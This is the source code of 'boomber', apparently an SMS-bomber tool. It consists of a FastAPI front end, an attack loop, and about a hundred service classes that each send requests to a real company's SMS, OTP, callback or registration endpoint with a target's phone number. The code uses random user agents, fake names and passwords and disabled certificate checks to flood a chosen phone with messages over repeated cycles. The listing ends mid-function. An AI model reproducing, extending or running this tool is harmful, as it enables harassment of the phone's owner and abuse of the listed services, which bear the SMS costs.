import os
from os.path import join

from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from fastapi.staticfiles import StaticFiles

from boomber.app.routers import attack, services, index

app = FastAPI(title="boomber")

app.add_middleware(
    CORSMiddleware, allow_origins=["*"], allow_methods=["*"], allow_headers=["*"],
)

app.mount(
    "/static", StaticFiles(directory=join(os.getcwd(), "app", "static")), name="static"
)

app.include_router(attack.router, prefix="/attack", tags=["attack"])
app.include_router(services.router, prefix="/services", tags=["services"])
app.include_router(index.router)



from boomber.services.service import Service


class KiloVkusa(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://kilovkusa.ru/ajax.php",
            params={
                "block": "auth",
                "action": "send_register_sms_code",
                "data_type": "json",
            },
            data={"phone": self.format(self.formatted_phone, "* (***) ***-**-**")},
        )



from boomber.services.service import Service


class IWant(Service):
    async def run(self):
        await self.post(
            "https://i-want.ru/api/auth/v1/customer/login/phone",
            json={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Osaka(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.osaka161.ru/local/tools/webstroy.webservice.php",
            data={
                "name": "Auth.SendPassword",
                "params[0]": self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class YandexEda(Service):
    async def run(self):
        await self.post(
            "https://eda.yandex/api/v1/user/request_authentication_code",
            json={"phone_number": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class FriendsClub(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://friendsclub.ru/assets/components/pl/connector.php",
            data={"casePar": "authSendsms", "MobilePhone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Uchidoma(Service):
    async def run(self):
        await self.post(
            "https://app.doma.uchi.ru/api/v1/parent/signup_start",
            json={
                "phone": "+" + self.formatted_phone,
                "first_name": "-",
                "utm_data": {},
                "via": "call",
            },
        )
        await self.post(
            "https://app.doma.uchi.ru/api/v1/parent/signup_start",
            json={
                "phone": "+" + self.formatted_phone,
                "first_name": "-",
                "utm_data": {},
                "via": "sms",
            },
        )



import inspect
import os
import sys
from functools import lru_cache
from typing import Dict, Union

from loguru import logger


@logger.catch
@lru_cache(maxsize=None)
def prepare_services(directory: str = "services") -> Dict[Union[int, str], list]:
    loaded_services = load_services(directory)
    all_phone_codes: Dict[Union[int, str], list] = {}
    special_services = []

    for service in loaded_services:
        if len(service.phone_codes) == 0:
            special_services.append(service)

        for phone_code in service.phone_codes:
            if phone_code not in all_phone_codes:
                all_phone_codes[phone_code] = []
            all_phone_codes[phone_code].append(service)

    for special_service in special_services:
        for key in all_phone_codes:
            all_phone_codes[key].append(special_service)

    all_phone_codes["other"] = special_services

    logger.success("Services preparation complete")
    return all_phone_codes


@logger.catch
def load_services(directory: str) -> list:
    files = os.listdir(directory)
    sys.path.insert(0, directory)
    loaded_services = []

    for file in files:
        if file.endswith(".py") and file != "service.py":
            module = __import__(file.replace(".py", ""))
            for member in inspect.getmembers(module, inspect.isclass):
                if member[1].__module__ == module.__name__:
                    loaded_services.append(getattr(module, member[0]))

    return loaded_services



from boomber.services.service import Service


class Uklon(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://uklon.com.ua/api/v1/account/code/send",
            headers={"client_id": "6289de851fc726f887af8d5d7a56c635"},
            json={"phone": self.formatted_phone},
        )
        await self.post(
            "https://partner.uklon.com.ua/api/v1/registration/sendcode",
            headers={"client_id": "6289de851fc726f887af8d5d7a56c635"},
            json={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class SushiMaster(Service):
    async def run(self):
        await self.post(
            "https://client-api.sushi-master.ru/api/v1/auth/init",
            json={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class VSK(Service):
    async def run(self):
        await self.post(
            "https://shop.vsk.ru/ajax/auth/postSms/",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class OnTaxi(Service):
    async def run(self):
        if self.country_code in self.country_codes:
            await self.post(
                "https://ontaxi.com.ua/api/v2/web/client",
                json={
                    "country": self.country_codes[self.country_code].upper(),
                    "phone": self.phone,
                },
            )



from boomber.services.service import Service


class Kant(Service):
    async def run(self):
        await self.post(
            "https://ginzadelivery.ru/v1/auth", json={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class UlybkaRadugi(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.r-ulybka.ru/login/ajax.php",
            data={
                "action": "sendcode",
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
            },
        )



from boomber.services.service import Service


class Cinema5(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://cinema5.ru/api/phone_code",
            data={"phone": self.format(self.formatted_phone, "+* (***) ***-**-**")},
        )



from boomber.services.service import Service


class LevinBH(Service):
    async def run(self):
        await self.post(
            "https://rubeacon.com/api/app/5ea871260046315837c8b6f3/middle",
            json={
                "url": "/api/client/phone_verification",
                "method": "POST",
                "data": {
                    "client_id": 5646981,
                    "phone": self.formatted_phone,
                    "alisa_id": 1,
                },
                "headers": {
                    "Client-Id": 5646981,
                    "Content-Type": "application/x-www-form-urlencoded",
                },
            },
        )



from boomber.services.service import Service


class Lenta(Service):
    async def run(self):
        await self.post(
            "https://lenta.com/api/v1/authentication/requestValidationCode",
            json={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class City24(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://city24.ua/personalaccount/account/registration",
            data={"PhoneNumber": self.formatted_phone},
        )



from boomber.services.service import Service


class Utair(Service):
    async def run(self):
        await self.post(
            "https://b.utair.ru/api/v1/login/",
            data={"login": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Kant(Service):
    async def run(self):
        await self.post(
            "https://www.kant.ru/ajax/profile/send_authcode.php",
            data={"Phone": self.formatted_phone},
        )



from boomber.services.service import Service


class WowWorks(Service):
    async def run(self):
        await self.post(
            "https://api.wowworks.ru/v2/site/send-code",
            json={"phone": self.formatted_phone, "type": 2},
        )



from boomber.services.service import Service


class Sportmaster(Service):
    phone_codes = [7]

    async def run(self):
        await self.get(
            "https://www.sportmaster.ru/user/session/sendSmsCode.do",
            params={"phone": self.format(self.formatted_phone, "+* (***) ***-**-**")},
        )



from boomber.services.service import Service


class Multiplex(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://auth.multiplex.ua/login", json={"login": self.formatted_phone},
        )



from boomber.services.service import Service


class TikTok(Service):
    async def run(self):
        if self.country_code in self.country_codes:
            await self.post(
                "https://m.tiktok.com/node/send/download_link",
                json={
                    "slideVerify": 0,
                    "language": "en",
                    "PhoneRegin": self.country_codes[self.country_code].upper(),
                    "Mobile": self.phone,
                    "page": {"af_adset_id": 0, "pid": 0},
                },
            )



from boomber.services.service import Service


class CarSmile(Service):
    async def run(self):
        await self.post(
            "https://api.carsmile.com/",
            json={
                "operationName": "enterPhone",
                "variables": {"phone": self.formatted_phone},
                "query": "mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n",
            },
        )



from boomber.services.service import Service


class StarPizzaCafe(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://pizzasushiwok.ru/index.php",
            data={
                "aj": "50",
                "registration-phone": self.format(
                    self.formatted_phone, "+** (***) ***-**-**"
                ),
            },
        )



from boomber.services.service import Service


class TvoyaApteka(Service):
    async def run(self):
        await self.post(
            "https://www.tvoyaapteka.ru/bitrix/ajax/form_user_new.php?confirm_register=1",
            data={"tel": "+" + self.formatted_phone, "change_code": 1},
        )



from boomber.services.service import Service


class Alpari(Service):
    async def run(self):
        await self.post(
            "https://alpari.com/api/en/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/",
            headers={"Referer": "https://alpari.com/en/registration/"},
            json={
                "client_type": "personal",
                "email": self.email,
                "mobile_phone": self.formatted_phone,
                "deliveryOption": "sms",
            },
        )



from random import randint

from boomber.services.service import Service


class Qlean(Service):
    async def run(self):
        await self.post(
            "https://qlean.ru/clients-api/v2/sms_codes/auth/request_code",
            json={"phone": self.formatted_phone},
        )
        await self.get(
            "https://sso.cloud.qlean.ru/http/users/requestotp",
            headers={"Referer": "https://qlean.ru/sso?redirectUrl=https://qlean.ru/"},
            params={
                "phone": self.formatted_phone,
                "clientId": "undefined",
                "sessionId": str(randint(5000, 9999)),
            },
        )



from boomber.services.service import Service


class EldoradoUA(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://api.eldorado.ua/v1/sign/",
            params={
                "login": self.formatted_phone,
                "step": "phone-check",
                "fb_id": "null",
                "fb_token": "null",
                "lang": "ru",
            },
        )



from boomber.services.service import Service


class ModulBank(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://my.modulbank.ru/api/v2/registration/nameAndPhone",
            json={
                "FirstName": self.russian_name,
                "CellPhone": self.phone,
                "Package": "optimal",
            },
        )



from boomber.services.service import Service


class CrossStudio(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://cross-studio.ru/ajax/lk/send_sms",
            data={
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "email": self.email,
                "pass": self.password,
                "pass1": self.password,
                "name": self.username,
                "fename": self.username,
                "hash": "",
            },
        )



from boomber.services.service import Service


class TarantinoFamily(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.tarantino-family.com/wp-admin/admin-ajax.php",
            data={"action": "callback_phonenumber", "phone": self.formatted_phone},
        )



from boomber.services.service import Service


class InDriver(Service):
    async def run(self):
        await self.post(
            "https://terra-1.indriverapp.com/api/authorization?locale=ru",
            data={
                "mode": "request",
                "phone": "+" + self.formatted_phone,
                "phone_permission": "unknown",
                "stream_id": 0,
                "v": 3,
                "appversion": "3.20.6",
                "osversion": "unknown",
                "devicemodel": "unknown",
            },
        )



from boomber.services.service import Service


class Getmancar(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://crm.getmancar.com.ua/api/veryfyaccount",
            json={
                "phone": "+" + self.formatted_phone,
                "grant_type": "password",
                "client_id": "gcarAppMob",
                "client_secret": "SomeRandomCharsAndNumbersMobile",
            },
        )



from boomber.services.service import Service


class VeziTaxi(Service):
    async def run(self):
        await self.get(
            "https://vezitaxi.com/api/employment/getsmscode",
            params={
                "phone": "+" + self.formatted_phone,
                "city": 561,
                "callback": "jsonp_callback_35979",
            },
        )



from boomber.services.service import Service


class RendesVouz(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.rendez-vous.ru/ajax/SendPhoneConfirmationNew/",
            data={
                "phone": self.format(self.formatted_phone, "+*(***)***-**-**"),
                "alien": "0",
            },
        )



from boomber.services.service import Service


class MenuUA(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.menu.ua/kiev/delivery/registration/direct-registration.html",
            data={
                "user_info[fullname]": self.russian_name,
                "user_info[phone]": self.formatted_phone,
                "user_info[email]": self.email,
                "user_info[password]": self.password,
                "user_info[conf_password]": self.password,
            },
        )
        await self.post(
            "https://www.menu.ua/kiev/delivery/profile/show-verify.html",
            data={"phone": self.formatted_phone, "do": "phone"},
        )



from boomber.services.service import Service


class Ozon(Service):
    async def run(self):
        await self.post(
            "https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
            json={"phone": self.formatted_phone, "otpId": 0},
        )



from boomber.services.service import Service


class IziUA(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://izi.ua/api/auth/register",
            json={
                "phone": "+" + self.formatted_phone,
                "name": self.russian_name,
                "is_terms_accepted": True,
            },
        )
        await self.post(
            "https://izi.ua/api/auth/sms-login",
            json={"phone": "+" + self.formatted_phone},
        )



import asyncio
import os
import sys

import click
import pkg_resources
import uvicorn
from loguru import logger

os.chdir(os.path.join(pkg_resources.get_distribution("boomber").location, "boomber"))

from boomber.app.main import app
from boomber.service import prepare_services
from boomber.utils import open_url


@logger.catch
@click.command()
@click.option("--ip", default="127.0.0.1")
@click.option("--port", default=8080)
@click.option("--only-api", "only_api", is_flag=True, default=False)
def main(ip: str, port: int, only_api: bool = False):
    if sys.platform == "win32":
        loop = asyncio.ProactorEventLoop()
        asyncio.set_event_loop(loop)

    app.state.only_api = only_api

    prepare_services()

    if not only_api:
        open_url(f"http://{ip}:{port}/")

    uvicorn.run(app, host=ip, port=port, log_level="error")


main()



from boomber.services.service import Service


class Sovest(Service):
    async def run(self):
        await self.get(
            "https://oauth.sovest.ru/oauth/authorize",
            data={
                "client_id": "dbo_web",
                "response_type": "urn:qiwi:oauth:response-type:confirmation-id",
                "username": "+" + self.formatted_phone,
                "recaptcha": "",
            },
        )



from boomber.services.service import Service


class Twitch(Service):
    async def run(self):
        await self.post(
            "https://passport.twitch.tv/register?trusted_request=true",
            json={
                "birthday": {"day": 11, "month": 11, "year": 1999},
                "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
                "include_verification_code": True,
                "password": self.password,
                "phone_number": self.formatted_phone,
                "username": self.username,
            },
        )



from boomber.services.service import Service


class Hmara(Service):
    async def run(self):
        await self.get(
            "https://api.hmara.tv/stable/entrance",
            params={"contact": self.formatted_phone},
        )



from boomber.services.service import Service


class CleverSite(Service):
    async def run(self):
        await self.post(
            "https://clients.cleversite.ru/callback/run.php",
            data={
                "siteid": "62731",
                "num": self.formatted_phone,
                "title": "Онлайн-консультант",
                "referrer": "https://m.cleversite.ru/call",
            },
        )



from boomber.services.service import Service


class Suanshi(Service):
    async def run(self):
        await self.get(
            "https://suandshi.ru/mobile_api/register_mobile_user",
            params={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Sushi33(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://auth.pizza33.ua/ua/join/check/",
            params={
                "callback": "angular.callbacks._1",
                "email": self.email,
                "password": self.password,
                "phone": self.phone,
                "utm_current_visit_started": 0,
                "utm_first_visit": 0,
                "utm_previous_visit": 0,
                "utm_times_visited": 0,
            },
        )



from boomber.services.service import Service


class Tinkoff(Service):
    async def run(self):
        await self.post(
            "https://api.tinkoff.ru/v1/sign_up",
            data={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class OnlineUa(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://secure.online.ua/ajax/check_phone/",
            params={"reg_phone": self.phone},
        )



from boomber.services.service import Service


class FoodBand(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://foodband.ru/api?call=calls",
            data={
                "customerName": self.russian_name,
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "g-recaptcha-response": "",
            },
        )
        await self.get(
            "https://foodband.ru/api/",
            params={
                "call": "customers/sendVerificationCode",
                "phone": self.phone,
                "g-recaptcha-response": "",
            },
        )



from boomber.services.service import Service


class FixPrice(Service):
    async def run(self):
        await self.post(
            "https://fix-price.ru/ajax/register_phone_code.php",
            data={
                "register_call": "Y",
                "action": "getCode",
                "phone": "+" + self.formatted_phone,
            },
        )



from boomber.services.service import Service


class Apteka(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://apteka.ru/_action/auth/getForm/",
            data={
                "form[NAME]": "",
                "form[PERSONAL_GENDER]": "",
                "form[PERSONAL_BIRTHDAY]": "",
                "form[EMAIL]": "",
                "form[LOGIN]": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "form[PASSWORD]": self.password,
                "get-new-password": "Получите пароль по SMS",
                "user_agreement": "on",
                "personal_data_agreement": "on",
                "formType": "simple",
                "utc_offset": "120",
            },
        )



from boomber.services.service import Service


class Sayoris(Service):
    async def run(self):
        await self.post(
            "https://sayoris.ru/?route=parse/whats",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class GazpromBank(Service):
    async def run(self):
        await self.post(
            "https://www.gazprombank.ru/rest/sms.send",
            json={
                "phone": self.format(self.formatted_phone, "+* (***) ***-**-**"),
                "type": "debit_card",
            },
        )



from boomber.services.service import Service


class Ollis(Service):
    async def run(self):
        await self.post(
            "https://www.ollis.ru/gql",
            json={
                "query": 'mutation { phone(number:"%s", locale:ru) { token error { code message } } }'
                % self.formatted_phone
            },
        )



import os
from os.path import join

from fastapi import APIRouter, Request, HTTPException
from fastapi.templating import Jinja2Templates
from loguru import logger

from boomber.service import prepare_services

router = APIRouter()
templates = Jinja2Templates(directory=join(os.getcwd(), "app", "templates"))


@logger.catch
@router.get("/")
def index(request: Request):
    if request.app.state.only_api:
        raise HTTPException(status_code=404)

    services = prepare_services()

    return templates.TemplateResponse(
        "index.html",
        {
            "request": request,
            "service_count": len(services[7]),
        },  # 7 corresponds to Russia which is a default choice
    )



from boomber.services.service import Service


class Tinder(Service):
    async def run(self):
        await self.post(
            "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
            data={"phone_number": self.formatted_phone},
        )



from boomber.services.service import Service


class MyGames(Service):
    async def run(self):
        await self.post(
            "https://account.my.games/signup_send_sms/",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class Bluefin(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://bluefin.moscow/auth/register/",
            data={
                "phone": self.format(self.phone, "(***)***-**-**"),
                "sendphone": "Далее",
            },
        )



from boomber.services.service import Service


class Raiffeisen(Service):
    async def run(self):
        await self.get(
            "https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code",
            params={"number": self.formatted_phone},
        )



from boomber.services.service import Service


class Buzzols(Service):
    async def run(self):
        await self.get(
            "https://it.buzzolls.ru:9995/api/v2/auth/register",
            params={"phoneNumber": "+" + self.formatted_phone},
            headers={"keywordapi": "ProjectVApiKeyword", "usedapiversion": "3"},
        )



from boomber.services.service import Service


class Moyo(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://www.moyo.ua/identity/registration",
            data={
                "firstname": self.russian_name,
                "phone": self.formatted_phone,
                "email": self.email,
            },
        )



from boomber.services.service import Service


class Imgur(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://api.imgur.com/account/v1/phones/verify",
            json={"phone_number": self.formatted_phone, "region_code": "RU"},
        )



from random import randint

from boomber.services.service import Service


class Ingos(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.ingos.ru/api/v1/lk/auth/register/fast/step2",
            headers={"Referer": "https://www.ingos.ru/cabinet/registration/personal"},
            json={
                "Birthday": "1986-07-10T07:19:56.276+02:00",
                "DocIssueDate": "2004-02-05T07:19:56.276+02:00",
                "DocNumber": randint(500000, 999999),
                "DocSeries": randint(5000, 9999),
                "FirstName": self.russian_name,
                "Gender": "M",
                "LastName": self.russian_name,
                "SecondName": self.russian_name,
                "Phone": self.phone,
                "Email": self.email,
            },
        )



from boomber.services.service import Service


class MisterCash(Service):
    phone_codes = [380]

    async def run(self):
        await self.get(
            "https://my.mistercash.ua/ru/send/sms/registration",
            params={"number": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class EshDerevenskoe(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://esh-derevenskoe.ru/index.php?route=checkout/checkout_ajax/sendcode&ajax=yes",
            data={"need_reg": "1", "phone": self.phone},
        )



from boomber.services.service import Service


class VisaPay(Service):
    async def run(self):
        await self.post(
            "https://pay.visa.ru/api/Auth/code/request",
            json={"phoneNumber": "+" + self.formatted_phone},
        )



import asyncio
import os
import re
import subprocess
import sys
import webbrowser
from functools import lru_cache
from typing import Awaitable, Callable

from loguru import logger


@logger.catch
def open_url(url: str):
    logger.info(f"Opening {url}...")
    if "com.termux" in os.environ.get("PREFIX", ""):  # If device is running Termux
        try:
            subprocess.run(
                [
                    "am",
                    "start",
                    "--user",
                    "0",
                    "-a",
                    "android.intent.action.VIEW",
                    "-d",
                    url,
                ]
            )
            return
        except FileNotFoundError:
            pass

    webbrowser.open(url, new=2, autoraise=True)


@logger.catch
@lru_cache(maxsize=None)
def retrieve_installed_version() -> str:
    package_info = subprocess.run(
        [sys.executable, "-m", "pip", "show", "boomber"],
        stdout=subprocess.PIPE,
        check=True,
    )
    bytes_version = re.search(br"Version: ([0-9]\.[0-9.]*)", package_info.stdout).group(
        1
    )
    return bytes_version.decode()


@logger.catch
async def await_with_callback(
    coroutine: Awaitable, callback: Callable, *args, **kwargs
):
    try:
        await coroutine
    except asyncio.CancelledError:
        raise
    except Exception:
        pass
    finally:
        callback(*args, **kwargs)



from boomber.services.service import Service


class Flipkart(Service):
    async def run(self):
        await self.post(
            "https://www.flipkart.com/api/5/user/otp/generate",
            headers={
                "Origin": "https://www.flipkart.com",
                "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop",
            },
            data={"loginId": "+" + self.formatted_phone},
        )
        await self.post(
            "https://www.flipkart.com/api/6/user/signup/status",
            headers={
                "Origin": "https://www.flipkart.com",
                "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop",
            },
            json={"loginId": "+" + self.formatted_phone, "supportAllStates": True},
        )



from boomber.services.service import Service


class SushiGourmet(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "http://sushigourmet.ru/auth",
            data={"phone": self.format(self.phone, "8 (***) ***-**-**"), "stage": 1},
        )



from boomber.services.service import Service


class IVI(Service):
    async def run(self):
        await self.post(
            "https://api.ivi.ru/mobileapi/user/register/phone/v6",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class AistTaxi(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "http://94.154.218.82:7201/api/account/register/sendConfirmCode",
            json={"phone": self.phone},
        )



from boomber.services.service import Service


class Pozichka(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://api.pozichka.ua/v1/registration/send",
            json={
                "RegisterSendForm": {
                    "phone": self.format(self.formatted_phone, "+**-***-***-**-**")
                }
            },
        )



from boomber.services.service import Service


class SushiProfi(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.sushi-profi.ru/api/order/order-call/",
            json={"phone": self.phone, "name": self.russian_name},
        )



from boomber.services.service import Service


class DNSShop(Service):
    async def run(self):
        await self.post(
            "https://www.dns-shop.ru/order/order-single-page/check-and-initiate-phone-confirmation/",
            params={"phone": self.formatted_phone, "is_repeat": 0, "order_guid": 1},
        )



from boomber.services.service import Service


class GuruTaxi(Service):
    async def run(self):
        await self.post(
            "https://guru.taxi/api/v1/driver/session/verify",
            json={"phone": {"code": 1, "number": self.phone}},
        )



from boomber.services.service import Service


class Helsi(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://helsi.me/api/healthy/accounts/login",
            json={"phone": self.formatted_phone, "platform": "PISWeb"},
        )



from boomber.services.service import Service


class Zolotoy585(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://www.585zolotoy.ru/api/sms/send_code/",
            headers={
                "client-type": "WEB",
                "company": "3e6efe10-defd-4983-94a1-c5a4d3cb3689",
                "region": "75c221cc-0386-4631-b47c-f8951d820a07",
            },
            json={"phone": self.formatted_phone,},
        )



from boomber.services.service import Service


class Tabris(Service):
    async def run(self):
        await self.post(
            "https://lk.tabris.ru/reg/",
            data={"action": "phone", "phone": self.formatted_phone},
        )



from boomber.services.service import Service


class NNCard(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://nn-card.ru/api/1.0/register",
            json={"phone": self.formatted_phone, "password": self.password},
        )



from boomber.services.service import Service


class Thehive(Service):
    async def run(self):
        await self.post(
            "https://thehive.pro/auth/signup",
            json={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class Grillnica(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://grilnica.ru/loginphone/",
            data={
                "step": 0,
                "phone": self.format(self.formatted_phone, "+* (***) ***-****"),
                "code": "",
                "allow_sms": "on",
                "apply_offer": "on",
            },
        )



from boomber.services.service import Service


class Pizza46(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://pizza46.ru/ajaxGet.php",
            data={"phone": self.format(self.formatted_phone, "+* (***) ***-****")},
        )



from boomber.services.service import Service


class AzbukaVkusa(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://oauth.av.ru/check-phone",
            json={"phone": self.format(self.formatted_phone, "+* (***) ***-**-**")},
        )



import asyncio
from datetime import datetime

from loguru import logger

from boomber.app.status import status
from boomber.service import prepare_services
from boomber.utils import await_with_callback


class AttackLogic:
    def __init__(
        self, attack_id: str, number_of_cycles: int, country_code: int, phone: str
    ):
        self.attack_id = attack_id
        self.number_of_cycles = number_of_cycles
        self.country_code = country_code
        self.phone = phone

    @logger.catch
    async def perform_attack(self):
        try:
            await self._perform_attack()
        except asyncio.CancelledError:
            pass

    async def _perform_attack(self):
        services = prepare_services()
        usable_services = services.get(self.country_code, services["other"])

        status[self.attack_id]["started_at"] = datetime.now().isoformat()
        status[self.attack_id]["end_at"] = len(usable_services) * self.number_of_cycles

        logger.info(f"Starting attack {self.attack_id} on +{self.phone}...")

        for cycle in range(self.number_of_cycles):
            logger.info(f"Started cycle {cycle + 1} of attack {self.attack_id}")

            tasks = [
                await_with_callback(
                    service(self.phone, self.country_code).run(),
                    update_count,
                    attack_id=self.attack_id,
                )
                for service in usable_services
            ]

            for task in asyncio.as_completed(tasks):
                await task

        logger.success(f"Attack {self.attack_id} on +{self.phone} ended")


@logger.catch
def update_count(attack_id: str):
    if status[attack_id]["currently_at"] is None:
        status[attack_id]["currently_at"] = 0
    status[attack_id]["currently_at"] += 1



from boomber.services.service import Service


class AtPrime(Service):
    async def run(self):
        await self.post(
            "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",
            data={"phone": self.formatted_phone},
        )



from boomber.services.service import Service


class FindClone(Service):
    async def run(self):
        await self.get(
            "https://findclone.ru/register",
            params={"phone": "+" + self.formatted_phone},
        )



from boomber.services.service import Service


class ProSushi(Service):
    async def run(self):
        await self.post(
            "https://www.prosushi.ru/php/profile.php",
            data={"phone": "+" + self.formatted_phone, "mode": "sms"},
        )



from boomber.services.service import Service


class Bartokyo(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://bartokyo.ru/ajax/login.php",
            data={
                "user_phone": self.format(self.formatted_phone, "+* (***) ***-****"),
            },
        )



from boomber.services.service import Service


class Ubki(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://secure.ubki.ua/b2_api_xml/ubki/auth",
            json={
                "doc": {
                    "auth": {
                        "mphone": "+" + self.formatted_phone,
                        "bdate": "11.11.1999",
                        "deviceid": "00100",
                        "version": "1.0",
                        "source": "site",
                        "signature": "undefined",
                    }
                }
            },
            headers={"Accept": "application/json"},
        )



from boomber.services.service import Service


class EGroshi(Service):
    phone_codes = [380]

    async def run(self):
        await self.post(
            "https://e-groshi.com/online/reg",
            data={
                "first_name": self.username,
                "last_name": self.username,
                "third_name": self.username,
                "phone": self.format(self.formatted_phone, "+** (***) ***-**-**"),
                "password": self.password,
                "password2": self.password,
            },
        )



import random

from boomber.services.service import Service


class NovaPoshta(Service):
    phone_codes = [7]

    async def run(self):
        name = "".join(random.choices("Іїє", k=random.randint(3, 5)))

        await self.post(
            "https://api.novaposhta.ua/v2.0/json/LoyaltyUserGeneral/registration",
            json={
                "modelName": "LoyaltyUserGeneral",
                "calledMethod": "registration",
                "system": "PA 3.0",
                "methodProperties": {
                    "City": "8d5a980d-391c-11dd-90d9-001a92567626",
                    "FirstName": name,
                    "LastName": name,
                    "Patronymic": name,
                    "Phone": f"0{self.phone}",
                    "Email": self.email,
                    "BirthDate": "02.02.2010",
                    "Password": "0c465655c53d2d8ec971581f5dfdbd83",
                    "Gender": "M",
                    "CounterpartyType": "PrivatePerson",
                    "MarketplacePartnerToken": "005056887b8d-b5da-11e6-9f54-cea38574",
                },
            },
        )



from boomber.services.service import Service


class PizzaSinizza(Service):
    phone_codes = [7]

    async def run(self):
        await self.post(
            "https://pizzasinizza.ru/api/phoneCode.php", json={"phone": self.phone},
        )



from boomber.services.service import Service


class Edostav(Service):
    async def run(self):
        await self.post(
            "https://vladimir.edostav.ru/site/CheckAuthLogin",
            data={"phone_or_email": "+" + self.formatted_phone},
        )



import random
import re
import string
from abc import ABC, abstractmethod
from typing import Callable

import httpx
from loguru import logger
from random_user_agent.user_agent import UserAgent


class Service(ABC):
    user_agent_rotator = UserAgent()
    headers = {
        "User-Agent": user_agent_rotator.get_random_user_agent(),
        "X-Requested-With": "XMLHttpRequest",
    }
    country_codes = {"7": "ru", "375": "by", "380": "ua"}
    phone_codes = []
    client = httpx.AsyncClient(headers=headers, verify=False)

    def __init__(self, phone: str, country_code: int):
        self.country_code = str(country_code)
        self.phone = phone[len(self.country_code) :]
        self.formatted_phone = phone

        self.russian_name = "".join(
            random.choice(
                "АаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфХхЦцЧчШшЩщЪъЫыЬьЭэЮюЯя"
            )
            for _ in range(5)
        )
        self.username = self.password = "".join(
            random.choice(string.ascii_letters) for _ in range(12)
        )
        self.email = (
            f"{self.username}@{random.choice(['gmail.com', 'mail.ru', 'yandex.ru'])}"
        )

    async def get(self, *args, **kwargs):
        return await self.request_logger(self.client.get, *args, **kwargs)

    async def post(self, *args, **kwargs):
        return await self.request_logger(self.client.post, *args, **kwargs)

    async def options(self, *args, **kwargs):
        return await self.request_logger(self.client.options, *args, **kwargs)

    async def request_logger(self, function: Callable, *args, **kwargs):
        response = await function(*args, **kwargs, timeout=3)
        if response.is_error:
            logger.info(
                f"{self.__class__.__name__} returned an error HTTP code: {response.status_code}"
            )

        return response

    async def get_csrf_token(self, url: str, pattern):
        response = await self.get(url)
